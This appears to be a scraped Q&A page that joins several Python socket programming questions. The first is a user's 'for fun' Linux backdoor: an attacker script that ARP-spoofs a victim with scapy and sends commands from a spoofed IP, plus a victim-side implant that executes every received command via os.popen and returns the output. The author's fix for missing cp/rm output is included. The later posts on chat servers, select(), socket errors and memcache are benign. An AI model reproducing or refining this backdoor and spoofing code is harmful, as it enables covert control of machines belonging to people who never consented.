i'm creating a reverse shell for a linux backdoor for fun, and I got it working to a point. Most commands work like "cd", "ifconfig", and "ls". But commands like "cp" and "rm" work on the victim computer, but I don't get any output on my side (the attacker), I get this error when I try to "rm" or "cp":
Can you guys help me try and handle this? I know cp doesn't actually output anything, and my program expects an output. Even though I get this error on my end, when I look at the victim I can still see the action (cp, or rm) go through. Another alternative is whenever I get this error, I can get my program to just prompt for a command again.
Any help would be sick!
Attacker code:
import sys
import socket
import threading
import time
from logging import getLogger, ERROR
from scapy.all import *
getLogger('scapy.runtime').setLevel(ERROR)
try:
victimIP = raw_input('Enter victim IP: ')
spoofIP = raw_input('Enter IP you want to spoof: ')
IF = raw_input('Enter network interface: ')
except KeyboardInterrupt:
print '[!] User Interrupted Input'
sys.exit(1)
conf.verb = 0
def getMAC():
try:
pkt = srp(Ether(dst = "ff:ff:ff:ff:ff:ff")/ARP(pdst = victimIP), timeout = 2, iface = IF, inter = 0.1)
except Exception:
print '[!] Failed to Resolve Victim MAC Address'
sys.exit(1)
for snd, rcv in pkt[0]:
return rcv.sprintf(r"%Ether.src%")
print '\n[*] Resolving Victim MAC Address... '
victimMAC = getMAC()
spoofStatus = True
def poison():
while 1:
if spoofStatus == False:
break
return
send(ARP(op=2, pdst=victimIP, psrc=spoofIP, hwdst=victimMAC))
time.sleep(5)
print '\n[*] Starting Spoofer Thread...'
thread = []
try:
poisonerThread = threading.Thread(target=poison)
thread.append(poisonerThread)
poisonerThread.start()
print '[*] Thread Started Successfully\n'
except Exception:
print '[!] Failed to Start Thread'
sys.exit(1)
print 'Initializing connection with victim...'
pkt1 = sr1(IP(dst=victimIP, src=spoofIP)/UDP(sport=77, dport=77)/Raw(load='hello victim'))
pkt2 = sr1(IP(dst=victimIP, src=spoofIP)/UDP(sport=77, dport=77)/Raw(load='report'))
prompt = pkt2.getlayer(Raw).load
print 'Initialization Complete'
print '[*] Enter "goodbye" to Stop Connection\n'
while 1:
command = raw_input(prompt)
sendcom = sr1(IP(dst=victimIP, src=spoofIP)/UDP(sport=77, dport=77)/Raw(load=command))
output = sendcom.getlayer(Raw).load
if command.strip() == 'goodbye':
print '\nGrabbing Threads...'
spoofStatus = False
poisonerThread.join()
sys.exit(1)
print output
Victim code:
import socket
import os
import sys
import platform
def launch():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind(('', 77))
launch = s.recvfrom(1024)
addr = launch[1][0]
port = launch[1][1]
s.sendto('hello paul', (addr, port))
return s, addr, port
s, addr, port = launch()
def getsysinfo():
que = s.recvfrom(1024)
prompt = []
if que[1][0] == addr and que[1][1] == port:
if os.getuid() == 0:
prompt.append('root#')
prompt.append('# ')
else:
prompt.append('user#')
prompt.append('$ ')
prompt.insert(1, platform.dist()[0])
s.sendto(''.join(prompt), (addr, port))
return
getsysinfo()
def shell():
while 1:
try:
command = s.recv(1024)
if command.strip().split()[0] == 'cd':
os.chdir(command.strip('cd '))
s.sendto('Changed Directory', (addr, port))
elif command.strip() == 'goodbye':
s.sendto('Goodbye paul', (addr, port))
s.close()
break
else:
proc = os.popen(command)
output = ''
for i in proc.readlines():
output += i
output = output.strip()
s.sendto(output, (addr, port))
except Exception:
s.sendto('An unexpected error has occured', (addr, port))
pass
shell()
I fixed it by adding this bit of code:
try:
output = sendcom.getlayer(Raw).load
except AttributeError:
continue
Related
I have used Python socket in ESP as a server and Laptop as a client. I customized the socket codes from this site. When I send the loop as the client input, I enter a loop on the server. I don't know how the while loop is broken when I send a word other than loop, For example "Hello".
server.py:
import socket
host = ''
port = 5560
def setupServer():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print("Socket created.")
try:
s.bind((host, port))
except socket.error as msg:
print(msg)
print("Socket bind comlete.")
return s
def setupConnection():
s.listen(1)
conn, address = s.accept()
print("Connected to: " + address[0] + ":" + str(address[1]))
return conn
def Hello_():
print('Hello')
def Loop_():
while True:
print('yes')
def dataTransfer(conn):
while True:
data = conn.recv(1024)
data = data.decode('utf-8')
dataMessage = data.split(' ', 1)
command = dataMessage[0]
if command == 'loop':
Loop_()
if command == 'Hello':
Hello_()
else:
print("X")
conn.close()
s = setupServer()
while True:
try:
conn = setupConnection()
dataTransfer(conn)
except:
break
client.py
import socket
host = '192.168.56.1'
port = 5560
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
while True:
command = input("Enter your command: ")
s.send(str.encode(command))
s.close()
I know your time is valuable and I appreciate your attention for spending time for help me.
If you want the Loop_() method to return when more data is received on the socket, you can modify the method so that it calls select() to poll the socket to see if more data has arrived, as shown below. (Note that I've added a conn argument to the Loop_() method so I can pass in the socket to check it)
import select
[...]
def Loop_(conn):
while True:
print('yes')
inReady, outReady, exReady = select.select([conn], [], [], 0.0)
if (conn in inReady):
print('more data has arrived at the TCP socket, returning from Loop_()')
break
def dataTransfer(conn):
while True:
data = conn.recv(1024)
data = data.decode('utf-8')
dataMessage = data.split(' ', 1)
command = dataMessage[0]
if command == 'loop':
Loop_(conn)
if command == 'Hello':
Hello_()
else:
print("X")
conn.close()
So i'm also including the server side of the code, but the issues in the client side. It's a simple TCP client socket code.The thing is that in line 21, after the first while loop (i've also commented in the code to where i'm referring to), i'm asking for user input.
What then happens is that when more user connects, the chat screen of any user doesn't gets updated unless they press enter, as you can see, it only continues after an input is given to the 'message' variable.
Now i do know that threading need to be done in here, but i've not really got enough knowledge related to that. So if someone could kindly guide me or help me modify the code so that the chat gets updated without the need to enter.
Cient Code (Issue in line 21, after first while loop...commented)
from socket import *
import select
import errno
import sys
header_length = 10
ip = "127.0.0.1"
port = 1234
my_username = input("Username: ")
client_socket = socket(AF_INET, SOCK_STREAM)
client_socket.connect((ip, port))
client_socket.setblocking(False)
username = my_username.encode()
username_header = f"{len(username):<{header_length}}".encode()
client_socket.send(username_header + username)
while True:
#Where my issue is
message = input(f"{my_username} > ")
if message:
message = message.encode()
message_header = f"{len(message):<{header_length}}".encode()
client_socket.send(message_header + message)
try:
while True:
#receive messages
username_header = client_socket.recv(header_length)
if not len(username_header):
print("Connection closed by the server...")
sys.exit()
username_length = int(username_header.decode().strip())
username = client_socket.recv(username_length).decode()
message_header = client_socket.recv(header_length)
message_length = int(message_header.decode().strip())
message = client_socket.recv(message_length).decode()
print(f"{username} > {message}")
except IOError as e:
if e.errno != errno.EAGAIN and e.errno != errno.EWOULDBLOCK:
print("Reading error: ", str(e))
sys.exit()
continue
except Exception as e:
print("General error: ", str(e))
sys.exit()
Server Code (Just if someone need):
from socket import *
import select
header_length = 10
ip = "127.0.0.1"
port = 1234
server_socket = socket(AF_INET, SOCK_STREAM)
server_socket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
server_socket.bind((ip, port))
server_socket.listen()
socket_list = [server_socket]
clients = {}
#Handles message receiving
def recieve_message(client_socket):
try:
message_header = client_socket.recv(header_length)
if not len(message_header):
return False
message_length = int(message_header.decode().strip())
return {'header': message_header, 'data': client_socket.recv(message_length)}
except:
return False
print(f'Listening for connections on {ip}:{port}...')
while True:
read_sockets, _, exception_sockets = select.select(socket_list, [], socket_list)
for notified_socket in read_sockets:
if notified_socket == server_socket:
client_socket, client_address = server_socket.accept()
user = recieve_message(client_socket)
if user is False:
continue
socket_list.append(client_socket)
clients[client_socket] = user
print(f"Accepted new connection from {client_address[0]}:{client_address[1]} username:{user['data'].decode()}")
else:
message = recieve_message(notified_socket)
if message is False:
print(f"Closed connection from {clients[notified_socket]['data'].decode()}")
socket_list.remove(notified_socket)
del clients[notified_socket]
continue
user = clients[notified_socket]
print(f"Recieved messasge from {user['data'].decode()}: {message['data'].decode()}")
for client_socket in clients:
if client_socket != notified_socket:
client_socket.send(user['header'] + user['data'] + message['header'] + message['data'])
for notified_socket in exception_sockets:
socket_list.remove(notified_socket)
del clients[notified_socket]
I've also included the image...as you can see as i typed hello in cliend 1's window, client 2's doesnt show it. And it will not until i input something and press enter
Thanks a lot :)
Why do you not use select.select for the client as you do for the server?
It works perfectly.
Linux version
from socket import *
import select
import errno
import sys
def prompt(username):
sys.stdout.write(f"{username} > ")
sys.stdout.flush()
header_length = 10
ip = "127.0.0.1"
port = 1234
my_username = input("Username: ")
client_socket = socket(AF_INET, SOCK_STREAM)
client_socket.connect((ip, port))
client_socket.setblocking(False)
username = my_username.encode()
username_header = f"{len(username):<{header_length}}".encode()
client_socket.send(username_header + username)
while True:
socket_list = [sys.stdin, client_socket]
prompt(my_username)
read_sockets, write_sockets, error_sockets = select.select(socket_list, [], [])
for socket in read_sockets:
try:
if socket == sys.stdin:
message = sys.stdin.readline()
message = message.encode()
message_header = f"{len(message):<{header_length}}".encode()
client_socket.send(message_header + message)
elif socket == client_socket:
username_header = client_socket.recv(header_length)
if not len(username_header):
print("Connection closed by the server...")
sys.exit()
username_length = int(username_header.decode().strip())
username = client_socket.recv(username_length).decode()
message_header = client_socket.recv(header_length)
message_length = int(message_header.decode().strip())
message = client_socket.recv(message_length).decode()
print(f"\n{username} > {message}")
except IOError as e:
if e.errno != errno.EAGAIN and e.errno != errno.EWOULDBLOCK:
print("Reading error: ", str(e))
sys.exit()
continue
except Exception as e:
print("General error: ", str(e))
sys.exit()
Windows/Linux version (because of select restriction)
Note:
File objects on Windows are not acceptable, but sockets are. On Windows, the
underlying select() function is provided by the WinSock library, and does not
handle file descriptors that don’t originate from WinSock.
import threading
from socket import *
import select
import errno
import sys
def prompt(username):
sys.stdout.write(f"{username} > ")
sys.stdout.flush()
def redirect_sdtin(dest):
for ln in sys.stdin:
dest.send(ln.encode())
header_length = 10
ip = "127.0.0.1"
port = 1234
my_username = input("Username: ")
stdin_in, stdin_out = socketpair()
threading.Thread(target=redirect_sdtin, args=(stdin_in,), daemon=True).start()
client_socket = socket(AF_INET, SOCK_STREAM)
client_socket.connect((ip, port))
client_socket.setblocking(False)
username = my_username.encode()
username_header = f"{len(username):<{header_length}}".encode()
client_socket.send(username_header + username)
while True:
socket_list = [stdin_out, client_socket]
prompt(my_username)
read_sockets, write_sockets, error_sockets = select.select(socket_list, [], [])
for socket in read_sockets:
try:
if socket == stdin_out:
message = stdin_out.recv(1024)
message_header = f"{len(message):<{header_length}}".encode()
client_socket.send(message_header + message)
elif socket == client_socket:
username_header = client_socket.recv(header_length)
if not len(username_header):
print("Connection closed by the server...")
sys.exit()
username_length = int(username_header.decode().strip())
username = client_socket.recv(username_length).decode()
message_header = client_socket.recv(header_length)
message_length = int(message_header.decode().strip())
message = client_socket.recv(message_length).decode()
print(f"\n{username} > {message}")
except IOError as e:
if e.errno != errno.EAGAIN and e.errno != errno.EWOULDBLOCK:
print("Reading error: ", str(e))
sys.exit()
continue
except Exception as e:
print("General error: ", str(e))
sys.exit()
I am trying to code a server with the following code. It is threaded and all I need help with is this error.
Unhandled exception in thread started by <function threaded_client at 0x0000000003302158>
line 28, in threaded_client
data = conn.recv(2048)
OSError: [WinError 10038] An operation was attempted on something that is not a socket
This error I cannot solve and have tried to solve. I would really like to know how to fix it.
import socket
import sys
from _thread import *
import time
host = ''
port = 5555
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.bind((host,port))
except socket.error as e:
print(str(e))
s.listen(5)
print("Waiting for a Connection...")
def threaded_client(conn):
conn.send(str.encode("Welcome, please write to the server.\r\n"))
userinput = ""
while True:
data = conn.recv(2048)
data = data.decode('utf-8')
if not data:
break
#data = data.decode('utf-8')
#Gather up the Input
if data == '\r\n':
userinput += data
#Do something with it
else:
reply = 'Server output: ' + userinput
conn.sendall(str.encode(reply))
userinput = ""
conn.close()
while True:
conn, addr = s.accept()
print("connected to: " +addr[0] + ': ' + str(addr[1]))
start_new_thread(threaded_client, (conn,))
Now I am having an issue with how the server interacts with the client. Image of my CMD window open bellow. Please provide code to fix.
For windows 8, please.
Check this part.
else:
reply = 'Server output: ' + userinput
conn.sendall(str.encode(reply))
userinput = ""
conn.close() #<--- here you are closing the connection
This should be outside the loop. Something like this.
while True:
data = conn.recv(2048)
data = data.decode('utf-8')
if not data:
break
#data = data.decode('utf-8')
#Gather up the Input
if data == '\r\n':
userinput += data
#Do something with it
else:
reply = 'Server output: ' + userinput
conn.sendall(str.encode(reply))
userinput = ""
conn.close() #<--- Notice the indent
I've seen and read a lot about this particular issue on the internet.
I am writing a simple chat server and client using socket in python for learning purpose mainly.
I've observed an issue here.
Here is my server code :
__author__ = 'pchakraverti'
import socket
import select
import sys
class NickSocketMap(object):
count = 0
def __init__(self, nick, client_socket):
self.nick = nick
self.client_socket = client_socket
NickSocketMap.count += 1
#staticmethod
def display_count():
print "Total number of clients is %d" % NickSocketMap.count
host = ""
port = 7575
socket_list = []
nick_list = []
cnt = 0
recv_buffer = 1024
def register_nick(nick, client_socket):
obj = NickSocketMap(nick, client_socket)
nick_list.append(obj)
def process_request(request_string, client_socket):
parts = request_string.split("|")
if parts[0] == "set_nick":
register_nick(parts[1], client_socket)
client_socket.send("nick_set")
elif parts[0] == "transmit_msg":
broadcast_message(parts[1], parts[2])
return 1
def broadcast_message(message, client_nick):
for s in nick_list:
if s.nick == client_nick:
try:
s.client_socket.send(message)
except socket.errno, ex:
print ex
break
def run_server():
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.bind((host, port))
except socket.errno, ex:
print ex
sys.exit(-1)
sock.listen(10)
# add the parent socket in the list
socket_list.append(sock)
# keep the server alive
while True:
try:
read_ready, write_ready, in_error = select.select(socket_list, [], [], 0)
except select.error, ex:
print ex
continue
for s in read_ready:
# check if s is the parent socket
if s == sock:
# accept new connection and append to list
try:
con, addr = s.accept()
if con not in socket_list:
socket_list.append(con)
except socket.errno, ex:
print ex
else:
try:
# receive packet from connected client
packet = s.recv(recv_buffer)
if not packet:
socket_list.remove(s)
read_ready.remove(s)
for n in nick_list:
if n.client_socket == s:
nick_list.remove(n)
break
break
print packet
except socket.errno, ex:
print ex
continue
process_request(packet, s)
sock.close()
if __name__ == "__main__":
run_server()
and here is my client code:
__author__ = 'pchakraverti'
import socket
nick = ""
host = "192.168.0.167"
port = 7575
sock = ""
def welcome():
print "Welecome to SecuChat!"
print "---------------------"
def init():
nick = raw_input("Enter your chat nickname : ")
print nick
global sock
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((host, port))
except socket.errno, ex:
print ex
sock.send("set_nick|"+nick)
#sock.close()
if __name__ == "__main__":
welcome()
init()
In the client code, when I don't do the sock.close(), the server runs into an exception :
Traceback (most recent call last):
File "server.py", line 102, in <module>
run_server()
File "server.py", line 84, in run_server
packet = s.recv(recv_buffer)
socket.error: [Errno 104] Connection reset by peer
how ever, when I add that line, the problem doesn't occur.
Now I've two questions :
i) I've handled exceptions in the server.py, why is this exception not being handled and why is it crashing the code ? How can I make the server more robust and what am I missing ?
ii) What is the logic behind this crash and exception in relation to the sock.close() line in the client ?
i) Your try-except block doesn't catch any exceptions.
The first argument to except must be the type of the exception you want to catch. socket.errno is not an exception class but a module. You need to catch socket.error:
except socket.error, ex:
print ex
It "crashes" your code because any exception that isn't handled somewhere in the call stack propagates outwards until it hits an except. If there is no handler the program is terminated.
ii) When the client terminates without closing the connection, a RST packet is sent by the TCP/IP stack of your OS. This is roughly the equivalent of hanging up a phone without saying goodbye. Python converts this into an exception with the text "Connection reset by peer". It simply means that since you called read() Python assumed you expect to receive something and when the connection suddenly disconnected, Python informs you of this by raising the exception.
When I have a except in memcache.Client, I can capture the exception, but mc.getstats still exec, what should I do to stop the main when have an exception?
def main():
if 'host' not in dir():
host = '127.0.0.1'
if 'port' not in dir():
port = '11211'
server = host + ':' + port
try:
mc = memcache.Client([server], debug=1,socket_timeout=3)
result = mc.get_stats()
mcstat = result[0][0]
print mcstat
except Exception,e:
print e
sys.exit(3)
if __name__ == "__main__":
try:
main()
except:
sys.exit(2)
import memcache
import sys
def main():
host = "127.0.0.1"
port = 11211
my_server = "{}:{}".format(host, port)
try:
mc = memcache.Client(
my_server #<**** Should be an array
)
result = mc.get_stats()
mcstat = result[0][0]
print mcstat
except ValueError, e:
print "Mission control: There was a problem..."
print e
sys.exit(3)
--output:--
Mission control: There was a problem...
Unable to parse connection string: "1"